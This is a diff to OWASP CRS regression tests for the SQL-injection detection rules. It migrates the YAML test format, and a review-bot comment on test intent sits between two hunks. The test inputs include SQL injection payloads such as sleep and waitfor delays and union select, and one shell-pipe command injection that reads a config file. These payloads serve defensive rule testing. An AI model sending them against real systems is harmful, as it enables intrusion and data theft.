- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\" | type %SystemDrive%\\\\config.ini | \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 14 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" - version: HTTP/1.0 - output: - log_contains: id "942100" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml index 37a054a9a..5af7502c1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml 
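Review bot: Test 13 asserts that the SQL-injection rule fires on `data: "var=\" | type %SystemDrive%\\\\config.ini | \""`, which is a shell-pipe style payload rather than SQL, and its `desc: "Advanced injection"` does not say that this is intentional; a reader maintaining the SQLi test set cannot tell whether a future non-match here is a regression or an expected tightening. Suggest stating the intent in the description, e.g. `desc: "Non-SQL payload (shell pipe with quotes) that is still expected to match 942100"`, or moving the case to the rule family it really exercises if that was the original purpose. Separately, the `Accept` header in this hunk and in the 942101 hunk is left as a plain scalar ending in `*/*;q=0.5`, whereas the 9413x0 hunks quote the same value; it parses correctly as written, but quoting it keeps the migrated files uniform and guards against a later edit introducing `#` or `: ` into the value.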
@@ -2,182 +2,181 @@ meta: author: "Christian Folini, Matteo Pace, azurit" description: Various SQL injection tests - enabled: true - name: 942101.yaml +rule_id: 942101 tests: - - test_title: 942101-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/1234%20OR%201=1" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/1234%20OR%201=1" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 2 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - 
uri: "/post/EmptyValue'%20and%20526=527" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 5 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/sleep(20)" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 6 desc: "Advanced 
SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 7 desc: "SQL Injection at the last segment of the path (request_basename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24'union+all+select+1,2,3+from+aa" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 8 desc: "SQL Injection inside the path (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: 
"/post/foo/24'union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 9 desc: "SQL Injection inside the path with comment block (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/%2A/%2A/2+union+all/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/%2A/%2A/2+union+all/bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 10 desc: "Negative test with incomplete SQL command inside the path" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/9'union+all/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" - - test_title: 942101-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: 
"/post/foo/9'union+all/bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942101] + - test_id: 11 desc: "Negative test with complete SQL command inside the path, but without comma" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942101] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index d6f008ecc..39094ed08 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml 
@@ -1,674 +1,671 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None - enabled: true - name: 942120.yaml +rule_id: 942120 tests: - - test_title: 942120-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=blahblah&var2=LIKE%20NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 2 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=RegExp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 3 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ">>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ">>" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 4 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%26%26" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 5 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<<" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 
+ uri: "/post" + data: "<<" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 6 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%21%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%21%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 7 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "||" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "||" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 8 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "XOR" - version: HTTP/1.0 - output: - 
log_contains: id "942120" - - test_title: 942120-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "XOR" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 9 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 10 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "IS NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "IS NULL" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 11 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - 
stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (0,1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (0,1)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 12 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (2147483647,-1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 13 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D%3E" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 14 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "regexp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "regexp" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 15 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RLIKE" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RLIKE" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 16 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "<>" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 17 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 18 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815914%2C+815913%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 19 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 20 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay= in ( Aa,- Ab-, and Ac)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP 
CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 21 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%3E%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%3E%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 22 desc: "SQL Injection Attack: not between * and " stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 